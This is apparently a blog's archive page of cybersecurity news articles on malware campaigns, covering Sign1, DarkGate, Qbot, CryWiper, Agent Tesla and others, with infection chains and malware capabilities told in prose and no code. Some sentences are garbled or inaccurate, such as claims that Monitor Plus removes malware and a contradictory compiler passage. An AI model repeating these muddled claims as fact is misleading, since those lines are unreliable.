Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Malware attacks. Show all posts
Malware attacks
Credential stealing Cyber Attacks Cyber Criminals Cyber Security Data data stealing Data stealing malware Kaspersky Malware attacks

Data-Stealing Malware Infections Surge by 600% in Three Years, Kaspersky Reports

 

The digital landscape has become increasingly treacherous, with a startling surge in data-stealing malware compromising millions of devices worldwide. According to cybersecurity firm Kaspersky, the number of devices infected with data-stealing malware has skyrocketed by over 600% in the past three years alone. This alarming trend underscores the urgent need for heightened vigilance and robust cybersecurity measures to safeguard personal and corporate data in an era plagued by relentless cyber threats. 

Kaspersky's Digital Footprint Intelligence data paints a grim picture, revealing that the number of compromised devices reached a staggering 10 million in 2023, marking a 643% increase since 2020. The threat posed by data-stealers has escalated exponentially, posing a significant risk to both consumers and businesses alike. What's particularly concerning is the sheer volume of log-in credentials pilfered by cybercriminals from infected devices. 

On average, each compromised device surrenders a staggering 50.9 log-in credentials, encompassing a wide array of sensitive accounts ranging from social media and online banking services to cryptocurrency wallets and email accounts. This abundance of stolen credentials fuels the illicit underground economy, where cybercriminals peddle stolen data for profit. The actual scope of the problem may be even more extensive than reported, as Kaspersky's data draws insights from infostealer malware log files traded on underground markets. 

The clandestine nature of these transactions makes it challenging to quantify the full extent of the threat landscape accurately. According to Sergey Shcherbel, a cybersecurity expert at Kaspersky Digital Footprint Intelligence, the dark-web value of log files containing login credentials varies depending on their appeal and the method of sale. These credentials may be sold through subscription services, aggregators catering to specific requests, or exclusive shops offering freshly acquired login credentials to select buyers. 

Prices typically start at $10 per log file, highlighting the lucrative nature of stolen data in the cyber underground. The impact of data-stealing malware extends beyond individual devices, with a staggering 443,000 websites worldwide falling victim to compromised credentials in the past five years alone. In the .in domain associated with India, compromised accounts surged to over 8 million in 2023, underscoring the global reach and pervasive nature of the threat. 

As the threat landscape continues to evolve, organizations and individuals must prioritize cybersecurity as a fundamental aspect of their digital hygiene practices. Proactive measures such as robust antivirus software, regular software updates, and user education can help mitigate the risk of data breaches and protect sensitive information from falling into the wrong hands. 

The exponential rise in data-stealing malware serves as a stark wake-up call for individuals and organizations worldwide. By staying vigilant, informed, and proactive in combating cyber threats, we can collectively fortify our defenses and safeguard against the perils of the digital age.
Read more »
WordPress
Cyber Assault Cyber Attacks CyberCrime Cybersecurity JavaScript Malware attacks Sucuri WordPress

Evasive Sign1 Malware Hits 39,000 WordPress Sites in Widespread Cyber Assault

 


In the past six months, a major malware campaign known as Sign1 has compromised over 39,000 WordPress sites, using malicious JavaScript injections to direct people to scams. In a report published this week by Sucuri, it is estimated that no less than 2,500 sites have been infected by this latest malware variant over the past two months. 

As part of the attack, rogue JavaScript is injected into legitimate HTML widgets or plugins, allowing attackers to insert arbitrary JavaScript, along with other code, which provides attackers with an opportunity for their malicious code to be inserted. It was discovered that a new malicious malware campaign called FakeUpdates was targeting WordPress websites with malware shortly after Check Point Software Technologies Ltd. revealed it. 

In addition to its stealthy nature, Sign1 malware has a perilous reputation due to its stealthy tactics. It generates dynamic URLs through time-based randomization, which is extremely difficult to detect and block with security software. The malware's code is also obfuscated, so it's more difficult to detect it. Sign1 is also able to target visitors to certain websites, including popular search engines and social media platforms. This might be one of the most concerning aspects of malware. 

Sucuri’s report estimates that over 39,000 WordPress websites have been infected with Sign1 so far, suggesting a level of sophistication that could enable attackers to focus on users deemed more susceptible to scams. Sucuri’s report indicates that this level of sophistication suggests an attacker's ability to focus on users who are more likely to be targeted by scammers. Sucuri's client has been breached due to a brute force attack, so website owners should take immediate measures to protect their websites and visitors. 

However, although specific details of how the attackers compromised other sites remain unclear, it is believed that the attackers utilized brute force assaults and plugin vulnerabilities to get into WordPress sites via brute force attacks. When the attackers get inside, they usually use the WordPress plugin Simple Custom CSS and JS to inject their malicious JavaScript through the custom HTML widgets, or they may even use the legitimate Simple Custom CSS and JS plugin as well. 

With its sophisticated evasion tactics, Sign1 can bypass conventional blocking measures by dynamically altering URLs every 10 minutes by utilizing time-based randomization; this allows it to circumvent conventional blocking strategies. Since these domains were registered just before the attacks they carried out, they remain off blocklists because of their fleeting nature. 

The attackers, initially hosted by Namecheap, have since moved their operations to HETZNER for web hosting. Cloudflare provides an additional layer of anonymity through IP address obfuscation for IP addresses. A significant challenge for security tools that attempt to detect the injected code is the intricacies of the injected code, which features XOR encoding and arbitrary variable names, which make it very difficult to detect them. 

The Sucuri insights revealed that the Sign1 malware has evolved to an increasingly sophisticated and stealthy stage, as well as being more resilient to steps taken to block it. Infections have dramatically increased over the past six months, especially with new malware versions unleashed on the market each week. Sign1, which has accelerated its sophistication and adaptability in recent months, has taken on an increasingly sophisticated and adaptive appearance since the campaign was initiated in January 2024. 

As a result of such developments, website administrators must immediately take extra precautions and implement robust protected measures to ensure that their websites remain secure. A HETZNER and Cloudflare server hosts the domains, obscuring both the hosting addresses as well as the IP addresses of the domains. 

Moreover, it may not be obvious that the injection code contains XOR encoding and random names for variables, so if you were to detect it, you would still have a hard time. Approximately six months have passed since the malware campaign started, the researchers concluded, adding that it has been developing actively since then. 

The campaign is still ongoing today. There are always spikes in infections whenever new versions are released by the developers. There has been an attack on about 2,500 websites so far on this latest attack that has been happening since the beginning of January 2024.

To keep a website secure, the researchers recommend that website owners implement a strong combination of usernames and passwords so that their website cannot be breached by brute-force attacks, which could be used against them. The attackers may also gain unrestricted access to your premises the moment you uninstall every plugin and theme that is unused or unnecessary on your website.
Read more »
user data security
Cyber Attacks Hacker attack Latin American Government Malicious PDF Attachment Malware attacks user data security

Colombian Government Impersonation Campaign Targets Latin American Individuals in Cyberattack

 

In a concerning development, a sophisticated cyberattack campaign has emerged, targeting individuals across Latin America by malicious actors who impersonate Colombian government agencies. These attackers have devised a cunning strategy, distributing emails containing PDF attachments that falsely accuse recipients of traffic violations or other legal infractions. 

The ultimate goal of these deceptive communications is to coerce unsuspecting victims into downloading an archive that conceals a VBS script, thereby initiating a multi-stage infection process. Initially, the script acquires the payload’s address from resources like textbin.net before proceeding to download and execute the payload from platforms such as cdn.discordapp(.)com, pasteio(.)com, hidrive.ionos.com, and wtools.io. 

This intricate execution chain progresses from PDF to ZIP, then to VBS and PowerShell, and finally to the executable file (EXE). The resulting payload is identified as one of several well-known remote access trojans (RATs), including AsyncRAT, njRAT, or Remcos. These malicious programs are notorious for their capability to provide unauthorized remote access to the infected systems, posing significant risks to victims’ privacy and data security. To combat this threat, cybersecurity professionals and researchers are urged to consult the TI Lookup tool for comprehensive information on these samples. 

This resource can greatly assist in identifying and mitigating threats associated with this campaign. It’s essential to note that while this campaign targets individuals in Latin America, the technique employed by the attackers is adaptable and could be utilized against targets in other regions as well. The cybersecurity community must remain vigilant and proactive in defending against such sophisticated threats. Employing robust security measures, including up-to-date antivirus software, intrusion detection systems, and regular security awareness training for employees, is crucial. 

Additionally, organizations should implement strict email security protocols to prevent malicious emails from reaching employees' inboxes. Furthermore, individuals should exercise caution when interacting with unsolicited emails, especially those containing attachments or links. Verifying the legitimacy of email senders and carefully scrutinizing email content can help prevent falling victim to phishing attacks. It’s also advisable to avoid downloading attachments or clicking on links from unknown or suspicious sources. 

In conclusion, the emergence of this cyberattack campaign underscores the ever-present threat posed by malicious actors seeking to exploit vulnerabilities for their gain. By staying informed, adopting proactive security measures, and fostering a culture of cybersecurity awareness, organizations and individuals can better protect themselves against such threats and safeguard their digital assets and personal information.
Read more »
Privacy
Cyberattacks CyberCrime DataBreaches Email Firefox Malware attacks Mozilla Privacy

Protecting User Privacy by Removing Personal Data from Data Broker Sites

 


As part of its new subscription service model, Mozilla Firefox is offering its users the possibility of finding and removing their personal and sensitive information from data brokers across the internet. This new subscription model is known as Mozilla Monitor Plus and will allow users to locate and remove their sensitive information. 

To eliminate their phone numbers, e-mail, home addresses, and other information that is usually sold to data broker platforms for profit, the company offers a new subscription model called Mozilla Monitor-Plus. This is particularly interesting since Mozilla already offers a free service of privacy monitoring called Firefox Monitor which was previously known as Mozilla Monitor - which is now being revamped to strengthen privacy for users.

Previously, Mozilla Monitor was a free service that sent users notifications when their email accounts had been compromised. The new version is now called Monitor-Plus, and it is a subscription-based service. Approximately 10 million current Mozilla Monitor users will now have the opportunity to run scans to see if their personal information has been hacked by using the subscription-based service. 

Whenever a breach is detected, Monitor Plus provides the tools to make sure that a user's information remains private again if a breach is detected. Data broker websites have a convoluted and confusing process that individuals have to deal with when they try to remove their information from them. It is not uncommon for people to find themselves unsure of who is using their personal information or how to get rid of it once they find it online.

However, most sites have either an opt-out page or require them to contact the broker directly to request removal. This process can be simplified by Mozilla Monitor, which searches across 190 data broker sites known for selling private and personal information proactively.

Mozilla will initiate a request on behalf of the user for removal if any data provided to Mozilla is discovered on those sites, including name, location, and birthdate. The removal process can take anywhere from a day to a month, depending on how serious the problem is. There are two subscription options available for users of this feature, the Monitor Plus subscription costs $13.99 per month or $8.99 per month with an annual subscription, which includes this feature. 

The free option for users who do not wish to subscribe to Firefox is to scan data broker sites once. However, these users will have to manually go through the steps to remove their information from these websites. This may encourage them to upgrade to the Monitor Plus subscription, as it provides automatic removals for a process that can be very tedious otherwise.

In regards to data breaches, both free and paid users will continue to receive alerts and will have access to tools to learn how to fix high-risk breaches. By providing their email addresses, as well as a few personal details such as their first and last name, city, state, and date of birth, users can initiate a free one-time scan for their device.

There will then be the possibility to scan the tool for potential exposures and let users know about them and how they can be fixed. It is Mozilla's policy to initiate a data removal request on behalf of users who wish to have their data removed. The status of the requests of users can be viewed, as well as the progress of their requests can be tracked. 

Furthermore, Mozilla will perform a monthly scan after the removal of personal information to ensure that it is kept safe on 190+ data broker sites even after the removal. Users must submit their first and last name, current city and state, date of birth, and email address to initiate a scan. Mozilla has an extensive privacy policy that protects the privacy of this information and encrypts it.

With this kind of information in hand, Mozilla applies a scan to your personal information, showing you where your information has been exposed by data breaches, brokers, or websites that collect personal information. In 2023 alone, 233 million people will have been affected by data breaches, and it is for this reason that a tool such as this is vital in the current environment. The Mozilla Monitor Plus subscription will include monthly scans and automatic removal of any malware that is found on your computer.
Read more »
Purple Fox
Cyber Attacks data security Data Theft Malware attacks Purple Fox

Ukraine Faces PurpleFox Malware Crisis: Unraveling the Ongoing Battle and Countermeasures

 

In a disturbing turn of events, the insidious PurpleFox malware has recently unleashed a wave of cyber havoc in Ukraine, infiltrating and compromising thousands of computers. This highly adaptable and elusive malware variant has sent shockwaves through the cybersecurity community, posing a significant challenge to both individuals and organizations alike. 

PurpleFox, renowned for its sophisticated tactics, primarily targets Windows-based systems by exploiting vulnerabilities, granting unauthorized access, and establishing a persistent presence within the infected devices. Armed with multifaceted capabilities such as data theft, remote command execution, and the ability to download and deploy additional malicious payloads, PurpleFox has proven a formidable adversary. 

Reports of compromised systems experiencing data breaches and operational disruptions are emerging, highlighting the malware's destructive potential. Its ability to remain dormant within systems makes detection an arduous task, further complicating the efforts of cybersecurity professionals to neutralize its impact. 

Security researchers point to various infection vectors, including malicious websites, infected email attachments, and stealthy drive-by downloads, as the primary means by which PurpleFox spreads. Its polymorphic nature, constantly mutating its code, renders traditional signature-based detection methods less effective, underscoring the need for advanced, adaptive cybersecurity measures. 

Prompted by the severity of the situation, Ukrainian authorities, alongside cybersecurity agencies, have initiated a concerted effort to contain and eliminate PurpleFox. Emergency response teams have been dispatched to affected regions to assess the extent of the damage and devise strategies for neutralizing the malware's threat. 

The motives behind the PurpleFox campaign in Ukraine remain mysterious, as the malware is a versatile tool often utilized for various cybercriminal activities, including espionage, data theft, and ransomware attacks. Investigations are underway to identify the perpetrators and their overarching objectives. 

To fortify defences against PurpleFox and similar threats, cybersecurity experts stress the importance of timely software updates, robust antivirus solutions, and comprehensive user education. Additionally, organizations are urged to implement network segmentation and closely monitor network traffic for anomalies that could signify a malware infection. 

This incident serves as a poignant reminder of the ever-evolving landscape of cyber threats. As cyber adversaries continually refine their tactics, a proactive and collaborative approach is indispensable to fortify digital defences and ensure the resilience of critical infrastructure. 

In conclusion, the PurpleFox malware outbreak in Ukraine underscores the critical importance of cybersecurity vigilance in our interconnected world. As the investigation unfolds, individuals and organizations must remain vigilant, adopting proactive measures to bolster their cybersecurity defences against the relentless evolution of cyber threats.
Read more »
social media risks
data deception GitHub malware Malware attacks social media risks

Sneaky USB Hackers Pose Threat on Favorite Sites

 

In a recent revelation in the world of cybersecurity, a financially motivated hacker has been discovered utilizing USB devices as a means to infiltrate computer systems. This malicious group has chosen a cunning approach, hiding their harmful software in plain view on widely used platforms like GitHub, Vimeo, and Ars Technica. 

Their strategy involves embedding malicious codes within seemingly innocuous content, creating a challenging environment for detection and prevention. We strongly advise our readers to maintain a vigilant stance while navigating the online platforms. 

Reassuring our website visitors, we confirm that the peculiar text strings encountered on GitHub and Vimeo pose no harm upon clicking. However, there's a twist: these seemingly harmless strings serve as a key tool for hackers, discreetly facilitating the download and deployment of harmful software in their attacks. 

The cybersecurity watchdogs, Mandiant, are actively monitoring this group of hackers identified as UNC4990. Operating in the shadows since 2020, they have specifically targeted individuals in Italy. 

The cyber assault unfolds with an unsuspecting individual clicking on a deceptive file on a USB drive. The mystery lies in how these USB devices find their way into the hands of unsuspecting users. Once opened, the file initiates a digital script, explorer.ps1, downloading an intermediary code that reveals a web address. This address acts as the gateway for installing a malware downloader named 'EMPTYSPACE.' 

UNC4990 initially employed special files on GitHub and GitLab but later shifted their tactics to Vimeo and Ars Technica, embedding their secret codes in mundane areas on these sites to avoid suspicion. The harmful PowerShell script, decoded, decrypted, and executed from legitimate sites, leads to the activation of EMPTYSPACE. This payload establishes communication with the hackers' control server, subsequently downloading a sophisticated backdoor called 'QUIETBOARD.' 

Additionally, UNC4990 employs this backdoor for crypto mining activities targeting Monero, Ethereum, Dogecoin, and Bitcoin. The financial gains from this cyber scheme exceed $55,000, not including the hidden Monero. 

QUIETBOARD, UNC4990's advanced backdoor, exhibits a wide range of capabilities, including executing commands, cryptocurrency theft, USB drive propagation, screenshot capture, system information collection, and geographical location determination. Mandiant highlights UNC4990's penchant for experimentation to refine their attack strategies. 

Despite ongoing efforts to mitigate USB-based malware threats, they persist as a significant danger. The tactic of concealing within reputable sites challenges traditional security measures, underscoring the need for enhanced online safety practices. In the evolving digital landscape, staying informed and vigilant is paramount. Cyber threats may emerge from unexpected quarters, demanding a proactive approach to cybersecurity.
Read more »
Trend Micro
cryptomining Cyber Threats DarkGate malware malware Malware attacks malware-as-a-service (MaaS). Microsoft Teams Phishing Campaigns QakBot Botnet Ransomware Trend Micro

Compromised Skype Accounts Facilitate DarkGate Malware Spread

 

Cyber attackers wielding the DarkGate malware have utilized compromised Skype accounts as a vector to infiltrate targets between July and September. They accomplished this by dispatching messages with VBA loader script attachments. 

Trend Micro's security researchers, who detected these attacks, noted that this script is responsible for fetching a second-stage AutoIT script. This script, in turn, is tailored to deploy the final DarkGate malware payload.

Trend Micro explained that gaining access to the victim's Skype account provided the attacker with the ability to take control of an ongoing messaging thread. This allowed them to manipulate the naming of files to align with the context of the conversation. 

Although the means by which the initial accounts of instant messaging applications were compromised remains unclear, it is theorized to have occurred either through leaked login credentials available on underground forums or as a consequence of a prior breach of the parent organization.

Furthermore, Trend Micro observed instances where DarkGate operators attempted to deliver their malware payload through Microsoft Teams. This occurred in organizations where the service was set up to accept messages from external users. 

Previously, Truesec and MalwareBytes had identified phishing campaigns targeting Microsoft Teams users. These campaigns utilized malicious VBScript to deploy the DarkGate malware. The attackers targeted users via compromised Office 365 accounts outside their respective organizations and leveraged a tool named TeamsPhisher. 

This tool enabled the bypassing of restrictions on incoming files from external sources, enabling the transmission of phishing attachments to Teams users. The ultimate objective remained infiltrating the entire environment. Depending on the specific threat group employing the DarkGate variant, the threats ranged from ransomware to cryptomining.

Trend Micro's telemetry data indicated that DarkGate frequently led to the detection of tools commonly associated with the Black Basta ransomware group.

The proliferation of the DarkGate malware loader for initial access into corporate networks has been on the rise, especially following the dismantling of the Qakbot botnet in August. This was due to international collaborative efforts. 

Prior to the disruption of Qakbot, an individual claiming to be the developer of DarkGate sought to sell subscriptions on a hacking forum, pricing them at up to $100,000 annually. The malware was marketed with an array of features, including a concealed VNC, capabilities to evade Windows Defender, a tool for pilfering browser history, an integrated reverse proxy, a file manager, and a Discord token snatcher.

Subsequent to this announcement, there has been a noticeable surge in reported DarkGate infections via various delivery methods like phishing and malvertising.

This recent upswing in DarkGate activity highlights the escalating influence of this malware-as-a-service (MaaS) operation within the realm of cybercrime. It underscores the unwavering determination of threat actors to persist in their attacks, demonstrating adaptability in tactics and methods despite disruptions and obstacles.
Read more »
Ransomware
Cyber Attacks Cyberattacks Cybersecurity Government Malware attacks PureCrypter Ransomware

Info-stealer Ransomware hit Government Organisations

 


Threat actors have targeted government entities with the PureCrypter malware downloader, which is used to deliver several information stealers and ransomware variants to targeted entities.  

According to a study conducted by researchers at Menlo Security, the initial payload of this attack was hosted on Discord by the threat actor. A non-profit organization was compromised to store more hosts for the campaign. 

Several different types of malware were delivered via the campaign, including Redline Stealer, Agent Tesla, Eternity, Black Moon, and Philadelphia Ransomware, researchers said in a statement. 

Several government organizations in the Asia Pacific (APAC) and North American regions have been targeted by PureCrypter's marketing campaign, according to researchers. 

Steps Involved in an Attack 

Firstly, the attacker sends an email with a Discord app link pointing to a password-protected ZIP archive containing a PureCrypter sample, which is then used to launch the attack. 

As of March 2021, PureCrypter began to become popular in the wild as a .NET malware downloader. Various types of malware are distributed by its operator on behalf of other cybercriminals through the use of the software. 

There is no content within this file, so when it is executed, it will deliver the next-stage payload from the compromised server of a non-profit organization, which in this case is a compromised command and control server.  

Researchers from Menlo Security examined Agent Tesla as the sample in their study. A Pakistan-based FTP server is connected to the Trojan as soon as it is launched, which receives all the stolen information on its server. 

The researchers discovered that when using leaked credentials in a breach, the threat actor took control of a particular FTP server and did not set it up themselves but rather used leaks of credentials to do so. As a result, the risk of identification was reduced and traceability was minimized. 

The Use of Agent Tesla Continues 

Cybercriminals use a malware family called Agent Tesla in their efforts to compromise Windows systems. In October 2020 and January 2021, it reached its peak in terms of usage. 

In a recent report released by Cofense, the company highlights the fact that Agent Tesla remains one of the most cost-effective and highly-capable backdoors in the market, and it has undergone continuous improvements and development during its lifespan.

Defense Intelligence recorded roughly one-third of all keylogger reports recorded by Defense Intelligence in the year 2022, which may be indicative of Tesla's keylogging activities. 

As a result of malware, the following capabilities can be observed: 

  • To gather sensitive information about the victim such as her password, all keystrokes the victim makes are recorded. 
  • A hacker can break into a web browser, email client, or file transfer application to steal passwords. 
  • The most effective way to protect confidential information on your desktop is to take screenshots of it as you use it. 
  • Obtain user names, passwords, and credit card numbers from the clipboard, as well as access clipboard contents. 
  • Send the stolen data to C2 via any of the following methods: FTP, SMTP, etc.
A feature of the attacks examined by Menlo Labs was that the threat actors managed to avoid detection by antivirus tools by injecting the AgentTesla payload into a legitimate process ("cvtres.exe") using process hollowing. 

Agent Tesla's communications with the C2 server, as well as its configuration files, are also encrypted with XOR. This is to protect them from network traffic monitoring tools used to monitor network traffic. 

According to Menlo Security, the threat actor behind PureCrypter is not one of the big players in the threat landscape. Nevertheless, it is worth taking note of its activities to determine whether or not it is targeting government agencies. 

As a result, it would be expected that the attacker would continue to use the compromised infrastructure for as long as possible before seeking out a new one. 
Read more »
Malware attacks
cyber threat data security DNS malware Malware attacks

Malware Attacks can be Thwarted by Tampering with DNS Communications


The notion that you can defend yourself against all malware is absurd, especially given that malware is a catch-all term that does not refer to any particular exploit, vector, objective, or methodology. There is no magic solution that will thwart every attack since the variety and breadth of cyber dangers are so great. As a result, it won't be long until your network environment is compromised, putting you in a position where you must make some extremely difficult choices. 

Successful cyberattacks, for instance, in the medical industry have significant legal and reputational ramifications in addition to affecting an organisation's capacity to function. These factors lead to medical business victims paying ransomware demands more frequently than those in any other sector. Healthcare institutions might save an average of $10.1 million per event avoided if they could spot warning signs of issues before they develop into full-blown attacks. 

None of the security solutions can completely stop all threats at the gate; instead, they each focus on a particular subset of malware and/or penetration pathways. Even if they could, the gate is occasionally completely skipped. As demonstrated by the Log4J exploit and the most recent compromise of the well-known Ctx Python package, "trusted" resource libraries hosted on websites like GitHub can be attacked by outside parties and used to disseminate malware payloads to a large number of endpoints without raising any alarm bells right away. 

Threats are present everywhere, not just online. By using the healthcare sector as an example once more, we can illustrate a different attack vector that can bypass all of your perimeter security: physical access. The majority of hospitals, doctors' offices, pharmacies, and other healthcare institutions rely on networked terminals and gadgets that are unintentionally left in locations where patients, visitors, or other unauthorised users can access them. In these circumstances, it makes little difference how well your network is protected from external attacks because a malicious party only needs to insert a USB stick or use a logged-in device to access malware, which compromises the network from within. 

Despite the fact that it may appear hopeless, there is one characteristic that unites the vast majority of malware: a weakness known as the Domain Name System (DNS). In the fight against cyber threats, DNS is a crucial choke point because more than 91% of malware leverages DNS connectivity at some stage in the attack life cycle. 

A malware infection initially seeks to avoid detection when it enters your network. During this period, it leverages the network environment as a reconnaissance phase in an effort to expand to other devices, find important resources, and compromise backup storage. 

This is also the time that the malware has to contact the command-and-control (C2) system of the hackers to get instructions and report the network-related data it has discovered. It must submit a request to a domain name server, like all other Internet traffic, in order to communicate with the outside world. Network administrators can use a protective DNS solution to monitor DNS traffic for signs of malicious behaviour and then take action by blocking, quarantining, or otherwise interfering with it.

Unfortunately, due to the constant development of new threats and the constant possibility of a physically initiated attack, businesses must be ready for the inevitable successful penetration of their networks. The use of DNS communication by malware, however, is nearly inevitable once it has gained access to your network. In order to render the virus inert and enable you to get started on cleaning up your systems and strengthening your defenses for the next time, a defensive DNS solution can identify these unusual requests and completely stop them.
Read more »
Malware attacks
CryWiper Cyber Fraud Cyberattacks Kapersky Malware attacks

Data Being Nuked by Malware Unseen Before in Russia's Courts and Mayors' Offices

 


According to Kaspersky and Russian news source Izvestia, mayors' offices and courts there are being attacked by never-before-seen malware masquerading as ransomware but wiping out data. 

It has been named CryWiper by Kaspersky researchers, which is a nod to the file extensions that are appended to deleted files after they are destroyed. Kaspersky says that its team has witnessed the malware deliver "pinpoint attacks" on Russian targets via a spyware program. On the other hand, the Izvestia newspaper reported that the targets of the attack were the office of the mayor and the court of the city. 

There was no immediate word on how many organizations were affected, how the malware managed to erase data, or whether data was successfully erased at this time. 

During the past decade, wiper malware has grown in popularity and become increasingly common. A virus called Shamoon was discovered in 2012 and caused havoc for companies named Saudi Aramco and RasGas of Qatar. In Saudi Arabia, Shamoon was again reworked four years later, and a version of the malware that was used to attack multiple organizations was introduced. There have been an approx. $10 billion of damage by the self-replicating malware dubbed NotPetya that spread across the globe within hours and has affected hundreds of thousands of computers worldwide. 

The past year has seen a slew of updated wiper blades emerge. Some examples include DoubleZero, IsaacWiper, HermeticWiper, CaddyWiper, WhisperGate, AcidRain, Industroyer2, and ransom. 

It has been reported by Kaspersky that the company has discovered recent attacks carried out by CryWiper. A note was left after the malware had infected a target. The message reportedly demanded 0.5 bitcoin and included the wallet address for payment. 

The results from Kaspersky's analysis of a sample of malware indicate that although this Trojan disguises itself as ransomware and extorts money from the victims for 'decrypting' their data, it does not encrypt data, but destroys it on purpose on the affected computer, according to the report from Kaspersky. A study of the Trojan's code showed that this was not a mistake made by the developer, but something that he had planned to do originally.

There are some similarities between CryWiper and IsaacWiper, which targeted organizations in Ukraine as part of its campaign. These two types of wipers are composed of pseudo-random numbers that are then used to corrupt targeted files by overwriting the contents of these files. There is a set of algorithms known as the Mersenne Vortex PRNG, these algorithms are rarely used, so the commonalities within these algorithms are striking. 

A unique characteristic that CryWiper shares with other ransomware families is its close connection with Trojan-Ransom.Win32.Xorist and Trojan-Ransom.MSIL.Agent. In particular, all three ransom notes contain the same email address. 

While analyzing the sample of CryWiper, Kaspersky discovered that it was a 64-bit Windows executable file. A C++ version of the software was written and compiled with the MinGW-w64 toolkit and the GCC compiler using the MinGW-w64 data set. 

Using Microsoft Visual Studio for malware that is written in C++ is quite unusual. This is because it is more common for malware written in C++ to use Microsoft Visual Studio for that purpose. 

This could have resulted from a choice to allow developers to port their code from Windows to Linux without going through a third-party compiler. 

Due to the large number of API calls that CryWiper makes to the Windows programming interface, it seems unlikely that this is the cause of the problem. In most cases, the developer who wrote the code was probably using a non-Windows device while writing the code. 

An attack that succeeds in wiping out a network often exploits the poor security of the network. Network engineers are advised by Kaspersky to take precautions by using the following tools:

  • A behavioral analysis-based endpoint protection solution is based on the analysis of files. 
  • When an intrusion is detected, security operations centers are responsible for managing detection, response, and taking action to resolve the problem.
  • Detects malicious files and URLs in your email attachments and blocks them to ensure that your mail is safe. Using such a system will make it much more difficult for attack vectors such as email attacks, which are the most common. 
  • Ensure that regular penetration testing and RedTeam projects are conducted. Identifying vulnerabilities in infrastructure and protecting them will help to reduce the attack surface for intruders, which in turn reduces the attack surface of the organization. 
  • Analyzing and monitoring threat data. There is a need to maintain up-to-date knowledge about the tactics intruders employ, the tools they use, and the infrastructure they use to detect and stop malicious activity promptly. 

There is no doubt that wiper malware is likely to continue to spread over the coming months. This is given Russia's invasion of Ukraine and other geopolitical conflicts around the world. 

According to the report by Kaspersky on Friday, "in many cases, wiper attacks and ransomware incidents are caused by weak network security, and it is critical to make sure that these security measures are strengthened." The firm also stated that it could be assumed that the number of cyberattacks, as well as those using wipers, will grow, in large part because of the unstable situation around the world.
Read more »
Malware Campaign
CMS Device Security JavaScript malware Malware attacks Malware Campaign

Experts Find Malware Controlling Thousands of Websites in Parrot TDS Network

The Parrot traffic direction system (TDS) that surfaced recently had a huge impact than what was thought earlier, research suggests. The malware affected more than 61,000 websites and was one of the top infections. Parrot TDS was first identified in April 2022 by cybersecurity company Avast, the PHP script had affected web servers that hosted more than 16,500 websites, acting as a gateway for future malware campaigns. It includes appending a part of infected code to all JavaScript files on affected web servers that host content management systems (CMS) like WordPress, these are attacked because of their weak login credentials and flawed plugins. 

"In 2021 alone, Sucuri said it removed Parrot TDS from nearly 20 million JavaScript files found on infected sites. In the first five months of 2022, over 2,900 PHP and 1.64 million JavaScript files have been observed containing the malware," reports The Hacker News. Alongside the use of sneaky techniques to hide the code, the "injected JavaScript may also be found well indented so that it looks less suspicious to a casual observer," said Denis Sinegubko, expert at Sucuri says. 

The aim of the JavaScript code is to jump-start the second phase of the attack, to deploy a PHP script that has been already injected on the server and is built to obtain information about website visitor, (for ex- IPs, browser, referrer, etc.) and send the details to a remote server. The third phase of the attack surfaces as a Javascript code, it works as a traffic direction system to find out the specific payload to send for a particular user based on the data which was shared in the second stage. 

When the TDS has confirmed the eligibility of a particular site visitor, the NDSX script deploys the final payload through a third-party website. The mostly used third-stage malware is a JavaScript downloader called FakeUpdates. 

"The NDSW malware campaign is extremely successful because it uses a versatile exploitation toolkit that constantly adds new disclosed and 0-day vulnerabilities. Once the bad actor has gained unauthorized access to the environment, they add various backdoors and CMS admin users to maintain access to the compromised website long after the original vulnerability is closed," said Sinegubko.

Read more »
User Data
data security malware Malware attacks QBot User Data

Qbot Malware: Steals Your Data In 30 Minutes

 

The large-scale spread of the Qbot malware (aka QuakBot or Qakbot) has taken up speed recently, as per the experts, it hardly takes around 30 minutes to steal Sensitive data after the early stage infiltration. The DFIR report suggests that Qbot was executing these fast data-stealing attacks in October 2021, and now it suggests that the hackers have resurfaced with similar strategies. Particularly, researchers believe that it takes around 30 minutes for the threat actors to steal browser info and emails from Outlook and around 50 minutes for the actors to switch to another workstation. 

The timeline suggests that Qbot travels fast to execute privilege escalation the moment an infection takes place, and a full-fledged monitoring scan can take up to ten minutes. Entry-level access to Qbot infections is generally obtained via phishing emails with harmful attacks, like Excel (XLS) documents that may use a macro to plant a DLL loader on the victim machine. Taking a look back, we have noticed that Qbot phishing campaigns use different infection file templates. If launched, the Qbot DLL payload is planted and deployed in genuine Windows applications to avoid detection, like Mobsync.exe or MSRA.exe. 

For instance, the DFIR report reveals that Qbot was planted into MSRA.exe and then creates a timelined task for privilege escalation. Besides this, Qbot DLL with the help of malware is added to Microsoft Defender's execution list, to avoid getting identified when planted into MSRA.exe. Qbot can steal mails in 30 minutes after the initial deployment, these mails are used in the future for phishing attacks. Experts observed that Qbot is also capable of stealing Windows credentials by dumping Local Security Authority Server Service (LSASS) process memory and stealing it from different browsers. 

The stolen credentials are later used for spreading the malware on other device networks laterally. The malware only took 50 minutes for dumping credentials after its execution. Bleeping Computer reports "Microsoft report from December 2021 captured the versatility of Qbot attacks, making it harder to evaluate the scope of its infections accurately. However, no matter how a Qbot infection unfolds precisely, it is essential to keep in mind that almost all begin with an email."
Read more »
Microsoft Excel
Cyber Attacks Cyberattacks Data Theft Malware attacks Microsoft Excel

Cyber Attackers Exploiting Microsoft Excel add-in Files

 


Recently a unit of researchers delivered a detailed study on a new phishing campaign at HP Wolf Security. As per the report, threat actors are exploiting Microsoft Excel add-in files in order to send various forms of malware into the systems that could leave businesses vulnerable to data theft, ransomware, and other cybercrime. 

Researchers said that threat actors are excessively using malicious Microsoft Excel add-in (XLL) files to damage the systems and it has been observed that there was an almost six-fold (588%) increment in attacks using this technique during the final quarter of 2021 compared to the previous three months.

XLL add-in files are very famous among people because they provide users to execute a wide range of extra tools and functions in Microsoft Excel. But like macros, they're a tool that can be exploited by threat actors. 

According to the report, threat actors distributed malicious links via phishing emails related to payment references, quotes, invoices, shipping documents, and orders that come with malicious Excel documents with XLL add-in files. The recipient is then tricked into clicking a malicious link, which can lead to the installation and activate the add-in of malware, freezing of the system as part of a ransomware attack, or the revelation of sensitive information. 

Malware families that have been used in attacks leveraging XLL files include Dridex, BazaLoader, IcedID, Agent Tesla, Stealer, Raccoon Formbook, and Bitrat. Some of these forms of malware also create backdoors onto infected Windows systems, which gives attackers remote access to the system. 

Additionally, Some XLL Excel Dropper services are advertised as costing over $2,000, which is expensive for community malware but criminal forum users seem willing to pay the price. 

